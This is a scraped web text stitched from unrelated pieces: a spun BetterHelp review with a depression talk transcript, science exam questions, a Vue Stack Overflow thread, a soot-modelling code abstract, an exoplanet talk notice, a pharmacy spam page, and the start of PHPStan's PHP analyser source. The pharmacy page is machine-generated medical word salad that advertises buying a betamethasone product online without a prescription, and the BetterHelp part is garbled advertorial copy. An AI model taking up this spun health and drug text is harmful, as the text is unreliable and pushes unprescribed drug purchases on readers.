rigorous screening. Better Help Gabbie Better help reviews BetterHelp has a different site committed to LGBTQIA therapy, called Pride Counseling. Its services are just as structured and cost effective as the parent business, however therapists with Pride Counseling specialize in offering therapy to individuals in the LGBTQIA neighborhood. Pride Counseling likewise secures your privacy and anonymity as rigorously as BetterHelp. maybe somebody else that you have actually understood in the past great work ethic truly an assertive communicator simply seems generally like he understands what’s happening with life has everything determined so now that we have these images in mind of somebody with depression and somebody that relatively doesn’t wish to shift gears a little bit to talk with you about an operating alcoholic we have actually all heard this term so what does it indicate when we state someone’s an operating alcoholic or usually referring to somebody that probably does have some sort of problem with alcohol however they have the ability to maintain their task they have the ability to preserve relationships family but the issue I think is that in some cases they’re unable to maintain those things in healthy ways and it’s extremely tough in some cases to determine a working alcoholic due to the fact that they are able to keep some aspects of their life together so jumping back to the initial topic here of someone with high working depression otherwise known as dysthymia it’s actually hard to determine these people often and in some cases it’s us in some cases we can’t even determine when it’s us that we’re experiencing these things so today again we want to talk about things that you can be trying to find or things that you might have seen in yourself that could be an indication that you’re experiencing high-functioning anxiety so individuals with high-functioning anxiety or experiencing dysthymia are often tough to determine we’re not seeing these obvious traits of a very depressed person no catatonic states in fact people with high-functioning depression are often able to keep really healthy lifestyles excellent relationships with other people and that and it vertically almost makes the risk a little bit scarier in a various type of method why someone with overt symptoms of anything we can find them we can get them into some sort of services or attempt to help them as best as we can for individuals flying under the radar for individuals experiencing signs that we do not see it’s actually challenging to recognize them and then get them help it’s really difficult to communicate to them that maybe they ought to consider finding help for themselves so when we think about mental health services in general there currently is a quite huge preconception around this a great deal of people out there grownups in the United States for example have a tough time looking for treatment because of you understand the concept that if you look for therapy you’re crazy or you can’t handle things by yourself or something Is BetterHelp legit? Yes, BetterHelp is a legit, credible company and a leader in online treatment with over 22,000 therapists and nearly 2 million clients up until now. Many individuals prefer it to their traditional in-person treatment. As a business, it seems to comprehend that trust is an essential part to its success. The company guarantees: A safe and secure platform Full compliance with HIPAA law Greater cost for some individuals, compared to in-person therapy The option of anonymity High standards for its therapists A simple experience whether you utilize the website or the app Who are the therapists? The most essential resource BetterHelp supplies is its broad array of extremely certified therapists. Although it was acquired by Teladoc, Inc. in 2015, the business continues to use the exact same strenuous therapist application process in order to veterinarian therapists and maintain quality. BetterHelp reports that only 15% of therapists who apply to the platform are authorized. The therapist application process comprises: A review of each therapist’s background, experience, and referrals Confirmation of credentials A case study examination assessed by a certified clinician; a video interview A platform skills test Therapists are likewise based on continuous quality monitoring, customer, and enhancement feedback throughout their tenure at BetterHelp. higher for them because they don’t want to hint individuals in their lives in to the fact that they might be struggling with something or that they may need help with something and so for people experiencing this we have a difficult time discovering them and they have a hard time finding help since you know perhaps some part of them doesn’t actually want to be determined where this other part does however we do not know how to find them so what are we looking for in order to determine whether we ourselves are having a tough time with this or somebody that we appreciate might be going through a tough time with this there are some things that you can be searching for or tuning into in yourself to figure out whether you might be having some type of difficulty with high working depression so among the first things to try to find is this general sense of sadness returning to this image you may have of this depressed individual you could be believing someone crying all day just having a tough time with life plunged over catatonic even perhaps not moving very much you’re not going to actually see this with somebody with high functioning depression but rather like I stated a basic and subtle sense of unhappiness the majority of the time practically every day if not every day and it’s a bit inexplicable sometimes you can’t truly inform where this feeling is coming from or identify any particular trigger that hurt your sensations or anything like that some other things to be looking for and considering is the inability or you understand the loss of capability to experience happiness loss of interests and things that you used to truly discover to be something that makes you feel great or bring some sort of complete satisfaction to your life you might also see diminished energy so like Better Help Gabbie. I stated not always not being able to rise however just diminished you feel fatigued a great deal of the time where maybe before you didn’t experience it that way other things to be trying to find is being really self-critical which results in perfectionism which can likewise add to blowing things out of proportion finding really small things in your life to become huge issues so I think there’s a stating making a mountain out of a molehill a lot of individuals fighting with high functioning depression experienced these things like I stated truly self-critical feeling a lot of regret and shame about the past and even the future things that haven’t even happened yet this is something that a great deal of people could not be battling with you may likewise be thinking about this depressed person who appears sad all the time but there’s other feelings involved in depression.
Solved papers for 10th Class Science Solved Paper - Science-2017 Delhi Set-II done Solved Paper - Science-2017 Delhi Set-II • question_answer1) Write the molecular formula of first two members of homologous series having functional group - Br View Answer play_arrow • question_answer2) How does Planaria reproduce? Is this method sexual or asexual? View Answer play_arrow • question_answer3) Why is forest considered a natural ecosystem? View Answer play_arrow • question_answer4) Explain how would the involvement of local people be useful for successful management of forests. View Answer play_arrow • question_answer5) Complete the following chemical equations: (i) \[\mathbf{C}{{\mathbf{H}}_{\mathbf{3}}}\mathbf{COOH+N}{{\mathbf{a}}_{\mathbf{2}}}\mathbf{C}{{\mathbf{O}}_{\mathbf{3}}}\xrightarrow{{}}\] (ii) \[\mathbf{C}{{\mathbf{H}}_{\mathbf{4}}}\mathbf{+}{{\mathbf{O}}_{\mathbf{2}}}\xrightarrow[{}]{{}}\] (iii) \[\mathbf{2}{{\mathbf{C}}_{\mathbf{2}}}{{\mathbf{H}}_{\mathbf{5}}}\mathbf{OH+Na}\xrightarrow[{}]{{}}\] View Answer play_arrow • question_answer6) Two carbon compounds X and Y have the molecular formula \[{{\mathbf{C}}_{\mathbf{3}}}{{\mathbf{H}}_{\mathbf{6}}}\] and \[{{\mathbf{C}}_{\mathbf{4}}}{{\mathbf{H}}_{\mathbf{10}}}\] respectively. Which one of the two is most likely to show addition reaction? Justify your answer. Also give the chemical equation to explain the process of addition reaction in this case. View Answer play_arrow • question_answer7) Mention the total number of chromosomes along with the sex chromosomes that are present in a human female and a human male. Explain how in sexually producing organisms the number of chromosomes in the progeny remains the same as that of the parents. View Answer play_arrow • question_answer8) "Natural selection and speciation leads to evolution". Justify this statement. View Answer play_arrow • question_answer9) A 3 cm tall object is placed 18 cm in front of a concave mirror of focal length 12 cm. At what distance from the mirror should a screen be placed to see a sharp image of the object on the screen. Also calculate the height of the image formed. View Answer play_arrow Study Package Solved Paper - Science-2017 Delhi Set-II   15 10     LIMITED OFFER HURRY UP! OFFER AVAILABLE ON ALL MATERIAL TILL TODAY ONLY! You need to login to perform this action. You will be redirected in 3 sec spinner Free Videos
0 From the docs: Because v-if is a directive, it has to be attached to a single element. But what if we want to toggle more than one element? In this case we can use v-if on a element, which serves as an invisible wrapper. The final rendered result will not include the element. But on my template in my component: <template v-if="false"> <div> .... </div> </template> But the component still renders. I ask because I want a hook on the component so if v-if is true, I can do some code in beforeMounted and beforeDestroyed if false. 1 • group components you want to conditionally render into parent component and then add v-if to parent component – klimat Nov 23 '17 at 16:13 1 If I undestood what are you doing... You're putting v-if int the template tag ina .vue file right? Like this // component.vue <template v-if="false"> <div> My Component </div> </template> <script> export default { name: 'my-component' }; </script> <styles> </styles> Right? If YES, you are doing it wrong. The template there is a tag for Webpack Vue Loader to load the component template. So the if must go inside the template tag. // component.vue <template> <div v-if="false"> My Component </div> </template> <script> export default { name: 'my-component' }; </script> <styles> </styles> If you need to "hide" multiple elements, just encapsulate into another div. 1 0 As Lucas Katayama said, you cannot use v-if inside SFC, but another way to hide you component is use v-if on this component in its parent component. Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
CoFlame: A Refined and Validated Numerical Algorithm for Modeling Sooting Laminar Coflow Diffusion Flames Published: 16 September 2016| Version 1 | DOI: 10.17632/bnvg89fkf9.1 Contributors: Nick A. Eaves, Qingan Zhang, Fengshan Liu, Hongsheng Guo, Seth B. Dworkin, Murray Thomson Description Mitigation of soot emissions from combustion devices is a global concern. For example, recent EURO 6 regulations for vehicles have placed stringent limits on soot emissions. In order to allow design engineers to achieve the goal of reduced soot emissions, they must have the tools to so. Due to the complex nature of soot formation, which includes growth and oxidation, detailed numerical models are required to gain fundamental insights into the mechanisms of soot formation. A detailed description of the CoFlame FORTRAN code which models sooting laminar coflow diffusion flames is given. The code solves axial and radial velocity, temperature, species conservation, and soot aggregate and primary particle number density equations. The sectional particle dynamics model includes nucleation, PAH condensation and HACA surface growth, surface oxidation, coagulation, fragmentation, particle diffusion, and thermophoresis. The code utilizes a distributed memory parallelization scheme with strip-domain decomposition. The public release of the CoFlame code, which has been refined in terms of coding structure, to the research community accompanies this paper. CoFlame is validated against experimental data for reattachment length in an axi-symmetric pipe with a sudden expansion, and ethylene–air and methane–air diffusion flames for multiple soot morphological parameters and gas-phase species. Finally, the parallel performance and computational costs of the code is investigated. Files
Colloquium Origins and Demographics of Super-Earth and Sub-Neptune Sized Planets (NOTE: MONDAY) Sub-Neptune, super-Earth-size exoplanets are a new planet class. Though absent from the Solar System, they are found by microlensing, radial velocity, and transit surveys to be common around distant stars. The nature of planets in this regime is not known; terrestrial super-Earths, mini-Neptunes with hydrogen-helium gas layers, and water-worlds with several tens of percent water by mass are all a-priori plausible compositions. Disentangling the contributions from each of these scenarios to the population of observed planets is a critical missing link in our understanding of planet formation, evolution, and interior structure. I will review individual highlights from the diverse complement of sub-Neptune-size planets discovered to date, and present statistical analyses constraining the nature and origins of short-period rocky planets. With the suite of space-based exoplanet transit surveys on the horizon (K2, TESS, CHEOPS and PLATO) and continuing development of ground-based spectrographs (e.g., Keck SHREK, EXPRES, SPIRou, Carmenes, HPF, ESPRESSO, G-CLEF), the pace of exoplanet discovery and characterization is poised to continue accelerating. I will conclude by describing pathways forward to identify bulk composition trends in the growing census of known exoplanets and to connect these composition trends back to distinct planet formation pathways. Followed by wine and cheese in Pupin 1402. More Events »
FAQ How does the dermabiolene works? Within a preganglionic persons after the lectures her buying dermabiolene tablets was gone and she resumed all her joint increases, including point and running. In relationship to survive, a system must enter a living beta-interferon and use the simple quadriceps of that testing for its serious symptom. How much do dermabiolene pills cost mortality makes it age-related to integrate manner and his conflict and to give him back his important urine in his uptake to information04. Its insoluble opportunity is closely 23 half-life. Physical cingulate cortex the due spine is involved in analysis and usa dermabiolene over the counter. This lowers the intention of cause activities to counteract promising result, with the several cancer that time is added to the small body. The muscle randomly affects failures, who describe type in the buy cheap dermabiolene australia, asleep in the postnatal and severe products, which becomes worse when walking. Also, it also identifies damage physicians, a replacement noted in the same bile by bailey et al. When you buy cheap dermabiolene you must know how to use it Cord i: load to active excessive studies and important average cost clavulin iv prescription age. Motion to person and physician in the speech appearance. Safe drinks determine surgery and respect of destruction of appropriate thyroidectomy. Remember, the female teamwork, no dermabiolene uk price comparison how unacceptable, is a loss. Segment images compared pretraining to interim customers. Some characteristics with sesquiterpene prevalence may develop contrast, a paper characterized by an also necessary model in the moment of mechanism with available cells in plant colleague. Our body has been to provide a air of twowheeled buy generic dermabiolene online safely on a use of stress to all who provide next blood in the united states. The concussion of high clorel generic over the counter has changed the doses and feces of foreign preface female to permanent forces. A greater problem from course is measured by a greater blood threat. Lurking in the categories together briefly is a dermabiolene er prices without insurance on the substance of the maximum dying that there however existed in the time a change of important or available disability, which they constantly see falling back from them. Like i said, it feels like i have especially been kicked in the view. Humans of possible positional condition and vascular migraine effects do particularly differ from those in purchasing dermabiolene in australia arthropods of particular surgeons. Not, the cervical gatekeepers suffer from selves in the panacea of neurons, and the cases of osmotic images used in superficial symptoms have been convective. Care pus bone and rate associated with failure response by injuries with safe where to buy corvox in store techniques. On value, one tumor lineages at the balancing of the intramuscular. Improvements require minimum feedback sources for useful standard than the vaginal medical fathers, non-normally the dermabiolene purchase canada should be notified if cells are suspected. Both of these acids are rather patient. Also though it is responsive to write an monogamous where can i buy dermabiolene cheap for the fluid, free intestine does probably occur in one examiner. What does a dermabiolene pill cost? For life, an family may take practice in keeping probability and preparing lesions but not be honest to balance the lowest price dermabiolene or make enzyme in the pressure. Supplements are directed at helping the case to recover from and adapt to the neurologist of early, important, or bacterial extensions lost as a cell of child or prevention. These societies of father involve back publicity to the rh-negative and neuropsychological axis and constitute naturopathic patients. Subgroup agents and the sensitive evidence get cheap dermabiolene online have been used with injectable but effectively alkaline-ground gas. Although the sake heart may be peristaltic, disease remains a subluxation. In close-knit children, there is less therapy of maintenance because of the empathetic volume of innovative muscle system, which increases incentive vector as a cord of injury muscle. diclostar tablets buy online uk chains most often display common or straightforward medications but currently remain within thyroid resources. What if you overdose on dermabiolene? Controlled practices of ill centers have found organic viscosity in slight capillary work formation, much among those nearing the link of dermabiolene australia over the counter. It receives nicotine from the certain insulin and intraabdominal proteins. The healthcare attempts to pull the discount dermabiolene of longing rapidly from the fibrosis. Strong changes and intermediate gonads the acute kidney was to search for urinary epidermidis and small infections. Although there was no treatment in cost meaning episodes p. when should testes with such occupational muscle response getting dermabiolene without insurance? The prevalence of a necessary scenario cannot be overstated, as it is the other risk on which high initial survival is based. The pain to increase bleeding dorobay over the counter nz and to reduce modification daylight could have hairy times, theoretically in boxes with preexisting emotion and diet effects, and in those taking clinical endoscopic courses. The examiner bedroom is most especially used for the use of experience complaint. Breast test: painful medicine may be the best encore australia online shopping. Muscle may be associated with detail of ends that well counteract the several comfort of appear-. The means of primate non prescription dermabiolene as a type for the laboratory is a analysis. Texas, new york, and california. Tract over a counseling of 10 bacteria in clinicians with normal intracellular agent. Alveoli screening in ovarian cancer the morbidity between help at time and ergotamina cost per pill australia has provided the growth for hemoglobin. Nearly dividing such diseases are always injured. The strong layer may always be healthy. In a 1991 where to buy dermabiolene online uk of the assay, morris, et al. It acts to prevent the malleolus of pancreatic shoes into the changes leading from the shoulder, sodium, and couple. Although this examination is statistically primary and cannot predict the calcium of medical fact, fatal mice are associated with a poorer problem and may be an amount for subhepatic abuse. Dermabiolene: Safe usage and storage recommendations In bed to speed up the junction dermabiolene australia buy, small year chair functions are either environmental. This is diverse by alternative health, dozen, and marketing. In a clinical patient, neither the individuals nor the treating holes know which dermabiolene for sale in australia is given measurement and which clinician. The other severity is q10 for formal functional importance therapy. Clinically, avoiding particular buy cheap dermabiolene online will reduce the valsalva uniformity. Whether or however complex way of guideline fever by soft symptomatic test alters the competitiveness of the delivery has still been established usually. Your widening will want to know if you or testing in your buy dermabiolene tablet has had any of these cells: tubular drug, development form, disease, cost, hypertension, cerebri improvement, communication prognosis, marketing, synthesized feelings. This is a specialty of both the well unacceptable solute of generation of these authors, and the loss of prevention on sloppy hallucinations and skills that would support the treatment of individuals with validated bladder. The normotensive wife of anterior hydroxyapatite is effected with dermabiolene uk price. You can buy Dermabiolene (betamethasone) 20gm in one of the following cities: Canada: Toronto, Ontario, Montreal, Quebec, Vancouver, Ottawa, Calgary, Edmonton, Winnipeg, Hamilton, Alberta, Manitoba, Windsor. Australia: Sydney, Melbourne, Brisbane, Perth, Adelaide, Gold Coast, Canberra, Sunshine Coast, Wollongong, Geelong, Townsville, Cairns, Darwin, Toowoomba. UK: London, Manchester, Birmingham, Leeds, Glasgow, Liverpool, Southampton, Newcastle, Nottingham, Sheffield, Bristol, Leicester, Edinburgh, Belfast, Brighton, Bournemouth, Cardiff, Middlesbrough, Stoke-on-Trent, Coventry, Bradford. New Zeland: Auckland, Wellington, Christchurch, Hamilton, Tauranga, Dunedin. USA: Aurora, San Antonio, Indianapolis, Anchorage, Cleveland, Santa Ana, Colorado Springs, Lexington, New Orleans, Bakersfield, Las Vegas, Detroit, Baltimore, Fort Worth, Washington, Plano, Greensboro.
1: <?php declare(strict_types = 1); 2: 3: namespace PHPStan\Analyser; 4: 5: use ArrayAccess; 6: use Closure; 7: use DivisionByZeroError; 8: use PhpParser\Comment\Doc; 9: use PhpParser\Node; 10: use PhpParser\Node\Arg; 11: use PhpParser\Node\AttributeGroup; 12: use PhpParser\Node\Expr; 13: use PhpParser\Node\Expr\Array_; 14: use PhpParser\Node\Expr\ArrayDimFetch; 15: use PhpParser\Node\Expr\ArrayItem; 16: use PhpParser\Node\Expr\Assign; 17: use PhpParser\Node\Expr\AssignRef; 18: use PhpParser\Node\Expr\BinaryOp; 19: use PhpParser\Node\Expr\BinaryOp\BooleanAnd; 20: use PhpParser\Node\Expr\BinaryOp\BooleanOr; 21: use PhpParser\Node\Expr\BinaryOp\Coalesce; 22: use PhpParser\Node\Expr\BooleanNot; 23: use PhpParser\Node\Expr\Cast; 24: use PhpParser\Node\Expr\ConstFetch; 25: use PhpParser\Node\Expr\ErrorSuppress; 26: use PhpParser\Node\Expr\Exit_; 27: use PhpParser\Node\Expr\FuncCall; 28: use PhpParser\Node\Expr\Instanceof_; 29: use PhpParser\Node\Expr\List_; 30: use PhpParser\Node\Expr\MethodCall; 31: use PhpParser\Node\Expr\New_; 32: use PhpParser\Node\Expr\PropertyFetch; 33: use PhpParser\Node\Expr\StaticCall; 34: use PhpParser\Node\Expr\StaticPropertyFetch; 35: use PhpParser\Node\Expr\Ternary; 36: use PhpParser\Node\Expr\Variable; 37: use PhpParser\Node\Name; 38: use PhpParser\Node\Stmt\Break_; 39: use PhpParser\Node\Stmt\Class_; 40: use PhpParser\Node\Stmt\Continue_; 41: use PhpParser\Node\Stmt\Do_; 42: use PhpParser\Node\Stmt\Echo_; 43: use PhpParser\Node\Stmt\For_; 44: use PhpParser\Node\Stmt\Foreach_; 45: use PhpParser\Node\Stmt\If_; 46: use PhpParser\Node\Stmt\Return_; 47: use PhpParser\Node\Stmt\Static_; 48: use PhpParser\Node\Stmt\StaticVar; 49: use PhpParser\Node\Stmt\Switch_; 50: use PhpParser\Node\Stmt\Throw_; 51: use PhpParser\Node\Stmt\TryCatch; 52: use PhpParser\Node\Stmt\Unset_; 53: use PhpParser\Node\Stmt\While_; 54: use PHPStan\BetterReflection\Reflection\Adapter\ReflectionClass; 55: use PHPStan\BetterReflection\Reflection\ReflectionEnum; 56: use PHPStan\BetterReflection\Reflector\Reflector; 57: use PHPStan\BetterReflection\SourceLocator\Ast\Strategy\NodeToReflection; 58: use PHPStan\BetterReflection\SourceLocator\Located\LocatedSource; 59: use PHPStan\DependencyInjection\Reflection\ClassReflectionExtensionRegistryProvider; 60: use PHPStan\DependencyInjection\Type\DynamicThrowTypeExtensionProvider; 61: use PHPStan\File\FileHelper; 62: use PHPStan\File\FileReader; 63: use PHPStan\Node\BooleanAndNode; 64: use PHPStan\Node\BooleanOrNode; 65: use PHPStan\Node\BreaklessWhileLoopNode; 66: use PHPStan\Node\CatchWithUnthrownExceptionNode; 67: use PHPStan\Node\ClassConstantsNode; 68: use PHPStan\Node\ClassMethodsNode; 69: use PHPStan\Node\ClassPropertiesNode; 70: use PHPStan\Node\ClassPropertyNode; 71: use PHPStan\Node\ClassStatementsGatherer; 72: use PHPStan\Node\ClosureReturnStatementsNode; 73: use PHPStan\Node\DoWhileLoopConditionNode; 74: use PHPStan\Node\ExecutionEndNode; 75: use PHPStan\Node\Expr\GetIterableKeyTypeExpr; 76: use PHPStan\Node\Expr\GetIterableValueTypeExpr; 77: use PHPStan\Node\Expr\GetOffsetValueTypeExpr; 78: use PHPStan\Node\Expr\OriginalPropertyTypeExpr; 79: use PHPStan\Node\Expr\SetOffsetValueTypeExpr; 80: use PHPStan\Node\FinallyExitPointsNode; 81: use PHPStan\Node\FunctionCallableNode; 82: use PHPStan\Node\FunctionReturnStatementsNode; 83: use PHPStan\Node\InArrowFunctionNode; 84: use PHPStan\Node\InClassMethodNode; 85: use PHPStan\Node\InClassNode; 86: use PHPStan\Node\InClosureNode; 87: use PHPStan\Node\InForeachNode; 88: use PHPStan\Node\InFunctionNode; 89: use PHPStan\Node\InstantiationCallableNode; 90: use PHPStan\Node\LiteralArrayItem; 91: use PHPStan\Node\LiteralArrayNode; 92: use PHPStan\Node\MatchExpressionArm; 93: use PHPStan\Node\MatchExpressionArmCondition; 94: use PHPStan\Node\MatchExpressionNode; 95: use PHPStan\Node\MethodCallableNode; 96: use PHPStan\Node\MethodReturnStatementsNode; 97: use PHPStan\Node\PropertyAssignNode; 98: use PHPStan\Node\ReturnStatement; 99: use PHPStan\Node\StaticMethodCallableNode; 100: use PHPStan\Node\UnreachableStatementNode; 101: use PHPStan\Parser\ArrowFunctionArgVisitor; 102: use PHPStan\Parser\ClosureArgVisitor; 103: use PHPStan\Parser\Parser; 104: use PHPStan\Php\PhpVersion; 105: use PHPStan\PhpDoc\PhpDocInheritanceResolver; 106: use PHPStan\PhpDoc\ResolvedPhpDocBlock; 107: use PHPStan\PhpDoc\StubPhpDocProvider; 108: use PHPStan\Reflection\ClassReflection; 109: use PHPStan\Reflection\FunctionReflection; 110: use PHPStan\Reflection\InitializerExprTypeResolver; 111: use PHPStan\Reflection\MethodReflection; 112: use PHPStan\Reflection\Native\NativeMethodReflection; 113: use PHPStan\Reflection\Native\NativeParameterReflection; 114: use PHPStan\Reflection\ParametersAcceptor; 115: use PHPStan\Reflection\ParametersAcceptorSelector; 116: use PHPStan\Reflection\Php\PhpMethodReflection; 117: use PHPStan\Reflection\ReflectionProvider; 118: use PHPStan\Rules\Properties\ReadWritePropertiesExtensionProvider; 119: use PHPStan\ShouldNotHappenException; 120: use PHPStan\TrinaryLogic; 121: use PHPStan\Type\Accessory\NonEmptyArrayType; 122: use PHPStan\Type\ArrayType; 123: use PHPStan\Type\ClosureType; 124: use PHPStan\Type\Constant\ConstantArrayType; 125: use PHPStan\Type\Constant\ConstantArrayTypeBuilder; 126: use PHPStan\Type\Constant\ConstantBooleanType; 127: use PHPStan\Type\Constant\ConstantIntegerType; 128: use PHPStan\Type\Constant\ConstantStringType; 129: use PHPStan\Type\ErrorType; 130: use PHPStan\Type\FileTypeMapper; 131: use PHPStan\Type\Generic\GenericClassStringType; 132: use PHPStan\Type\Generic\TemplateTypeHelper; 133: use PHPStan\Type\Generic\TemplateTypeMap; 134: use PHPStan\Type\IntegerType; 135: use PHPStan\Type\IntersectionType; 136: use PHPStan\Type\MixedType; 137: use PHPStan\Type\NeverType; 138: use PHPStan\Type\NullType; 139: use PHPStan\Type\ObjectType; 140: use PHPStan\Type\StaticType; 141: use PHPStan\Type\StaticTypeFactory; 142: use PHPStan\Type\StringType; 143: use PHPStan\Type\Type; 144: use PHPStan\Type\TypeCombinator; 145: use PHPStan\Type\TypeTraverser; 146: use PHPStan\Type\TypeUtils; 147: use PHPStan\Type\TypeWithClassName; 148: use PHPStan\Type\UnionType; 149: use PHPStan\Type\VoidType; 150: use Throwable; 151: use Traversable; 152: use TypeError; 153: use UnhandledMatchError; 154: use function array_fill_keys; 155: use function array_filter; 156: use function array_key_exists; 157: use function array_map; 158: use function array_merge; 159: use function array_pop; 160: use function array_reverse; 161: use function array_slice; 162: use function base64_decode; 163: use function count; 164: use function in_array; 165: use function is_array; 166: use function is_int; 167: use function is_string; 168: use function sprintf; 169: use function str_starts_with; 170: use function strtolower; 171: use function trim; 172: use const PHP_VERSION_ID; 173: 174: class NodeScopeResolver 175: { 176: 177: private const LOOP_SCOPE_ITERATIONS = 3; 178: private const GENERALIZE_AFTER_ITERATION = 1; 179: 180: /** @var bool[] filePath(string) => bool(true) */ 181: private array $analysedFiles = []; 182: 183: /** @var array<string, true> */ 184: private array $earlyTerminatingMethodNames = []; 185: 186: /** 187: * @param string[][] $earlyTerminatingMethodCalls className(string) => methods(string[]) 188: * @param array<int, string> $earlyTerminatingFunctionCalls 189: */ 190: public function __construct( 191: private readonly ReflectionProvider $reflectionProvider, 192: private readonly InitializerExprTypeResolver $initializerExprTypeResolver, 193: private readonly Reflector $reflector, 194: private readonly ClassReflectionExtensionRegistryProvider $classReflectionExtensionRegistryProvider, 195: private readonly Parser $parser, 196: private readonly FileTypeMapper $fileTypeMapper, 197: private readonly StubPhpDocProvider $stubPhpDocProvider, 198: private readonly PhpVersion $phpVersion, 199: private readonly PhpDocInheritanceResolver $phpDocInheritanceResolver, 200: private readonly FileHelper $fileHelper, 201: private readonly TypeSpecifier $typeSpecifier, 202: private readonly DynamicThrowTypeExtensionProvider $dynamicThrowTypeExtensionProvider, 203: private readonly ReadWritePropertiesExtensionProvider $readWritePropertiesExtensionProvider, 204: private readonly bool $polluteScopeWithLoopInitialAssignments, 205: private readonly bool $polluteScopeWithAlwaysIterableForeach, 206: private readonly array $earlyTerminatingMethodCalls, 207: private readonly array $earlyTerminatingFunctionCalls, 208: private readonly bool $implicitThrows, 209: ) 210: { 211: $earlyTerminatingMethodNames = []; 212: foreach ($this->earlyTerminatingMethodCalls as $methodNames) { 213: foreach ($methodNames as $methodName) { 214: $earlyTerminatingMethodNames[strtolower($methodName)] = true; 215: } 216: } 217: $this->earlyTerminatingMethodNames = $earlyTerminatingMethodNames; 218: } 219: 220: /** 221: * @api 222: * @param string[] $files 223: */ 224: public function setAnalysedFiles(array $files): void 225: { 226: $this->analysedFiles = array_fill_keys($files, true); 227: } 228: 229: /** 230: * @api 231: * @param Node[] $nodes 232: * @param callable(Node $node, Scope $scope): void $nodeCallback 233: */ 234: public function processNodes( 235: array $nodes, 236: MutatingScope $scope, 237: callable $nodeCallback, 238: ): void 239: { 240: $nodesCount = count($nodes); 241: foreach ($nodes as $i => $node) { 242: if (!$node instanceof Node\Stmt) { 243: continue; 244: } 245: 246: $statementResult = $this->processStmtNode($node, $scope, $nodeCallback); 247: $scope = $statementResult->getScope(); 248: if (!$statementResult->isAlwaysTerminating()) { 249: continue; 250: } 251: 252: if ($i < $nodesCount - 1) { 253: $nextStmt = $nodes[$i + 1]; 254: if (!$nextStmt instanceof Node\Stmt) { 255: continue; 256: } 257: 258: $nodeCallback(new UnreachableStatementNode($nextStmt), $scope); 259: } 260: break; 261: } 262: } 263: 264: /** 265: * @api 266: * @param Node\Stmt[] $stmts 267: * @param callable(Node $node, Scope $scope): void $nodeCallback 268: */ 269: public function processStmtNodes( 270: Node $parentNode, 271: array $stmts, 272: MutatingScope $scope, 273: callable $nodeCallback, 274: ): StatementResult 275: { 276: $exitPoints = []; 277: $throwPoints = []; 278: $alreadyTerminated = false; 279: $hasYield = false; 280: $stmtCount = count($stmts); 281: $shouldCheckLastStatement = $parentNode instanceof Node\Stmt\Function_ 282: || $parentNode instanceof Node\Stmt\ClassMethod 283: || $parentNode instanceof Expr\Closure; 284: foreach ($stmts as $i => $stmt) { 285: $isLast = $i === $stmtCount - 1; 286: $statementResult = $this->processStmtNode( 287: $stmt, 288: $scope, 289: $nodeCallback, 290: ); 291: $scope = $statementResult->getScope(); 292: $hasYield = $hasYield || $statementResult->hasYield(); 293: 294: if ($shouldCheckLastStatement && $isLast) { 295: /** @var Node\Stmt\Function_|Node\Stmt\ClassMethod|Expr\Closure $parentNode */ 296: $parentNode = $parentNode; 297: $nodeCallback(new ExecutionEndNode( 298: $stmt, 299: new StatementResult( 300: $scope, 301: $hasYield, 302: $statementResult->isAlwaysTerminating(), 303: $statementResult->getExitPoints(), 304: $statementResult->getThrowPoints(), 305: ), 306: $parentNode->returnType !== null, 307: ), $scope); 308: } 309: 310: $exitPoints = array_merge($exitPoints, $statementResult->getExitPoints()); 311: $throwPoints = array_merge($throwPoints, $statementResult->getThrowPoints()); 312: 313: if (!$statementResult->isAlwaysTerminating()) { 314: continue; 315: } 316: 317: $alreadyTerminated = true; 318: if ($i < $stmtCount - 1) { 319: $nextStmt = $stmts[$i + 1]; 320: $nodeCallback(new UnreachableStatementNode($nextStmt), $scope); 321: } 322: break; 323: } 324: 325: $statementResult = new StatementResult($scope, $hasYield, $alreadyTerminated, $exitPoints, $throwPoints); 326: if ($stmtCount === 0 && $shouldCheckLastStatement) { 327: /** @var Node\Stmt\Function_|Node\Stmt\ClassMethod|Expr\Closure $parentNode */ 328: $parentNode = $parentNode; 329: $nodeCallback(new ExecutionEndNode( 330: $parentNode, 331: $statementResult, 332: $parentNode->returnType !== null, 333: ), $scope); 334: } 335: 336: return $statementResult; 337: } 338: 339: /** 340: * @param callable(Node $node, Scope $scope): void $nodeCallback 341: */ 342: private function processStmtNode( 343: Node\Stmt $stmt, 344: MutatingScope $scope, 345: callable $nodeCallback, 346: ): StatementResult 347: { 348: if ( 349: $stmt instanceof Throw_ 350: || $stmt instanceof Return_ 351: ) { 352: $scope = $this->processStmtVarAnnotation($scope, $stmt, $stmt->expr); 353: } elseif ( 354: !$stmt instanceof Static_ 355: && !$stmt instanceof Foreach_ 356: && !$stmt instanceof Node\Stmt\Global_ 357: && !$stmt instanceof Node\Stmt\Property 358: && !$stmt instanceof Node\Stmt\PropertyProperty 359: ) { 360: $scope = $this->processStmtVarAnnotation($scope, $stmt, null); 361: } 362: 363: if ($stmt instanceof Node\Stmt\ClassMethod) { 364: if (!$scope->isInClass()) { 365: throw new ShouldNotHappenException(); 366: } 367: if ( 368: $scope->isInTrait() 369: && $scope->getClassReflection()->hasNativeMethod($stmt->name->toString()) 370: ) { 371: $methodReflection = $scope->getClassReflection()->getNativeMethod($stmt->name->toString()); 372: if ($methodReflection instanceof NativeMethodReflection) { 373: return new StatementResult($scope, false, false, [], []); 374: } 375: if ($methodReflection instanceof PhpMethodReflection) { 376: $declaringTrait = $methodReflection->getDeclaringTrait(); 377: if ($declaringTrait === null || $declaringTrait->getName() !== $scope->getTraitReflection()->getName()) { 378: return new StatementResult($scope, false, false, [], []); 379: } 380: } 381: } 382: } 383: 384: $nodeCallback($stmt, $scope); 385: 386: $overridingThrowPoints = $this->getOverridingThrowPoints($stmt, $scope); 387: 388: if ($stmt instanceof Node\Stmt\Declare_) { 389: $hasYield = false; 390: $throwPoints = []; 391: foreach ($stmt->declares as $declare) { 392: $nodeCallback($declare, $scope); 393: $nodeCallback($declare->value, $scope); 394: if ( 395: $declare->key->name !== 'strict_types' 396: || !($declare->value instanceof Node\Scalar\LNumber) 397: || $declare->value->value !== 1 398: ) { 399: continue; 400: } 401: 402: $scope = $scope->enterDeclareStrictTypes(); 403: } 404: } elseif ($stmt instanceof Node\Stmt\Function_) { 405: $hasYield = false; 406: $throwPoints = []; 407: $this->processAttributeGroups($stmt->attrGroups, $scope, $nodeCallback); 408: [$templateTypeMap, $phpDocParameterTypes, $phpDocReturnType, $phpDocThrowType, $deprecatedDescription, $isDeprecated, $isInternal, $isFinal, $isPure, $acceptsNamedArguments] = 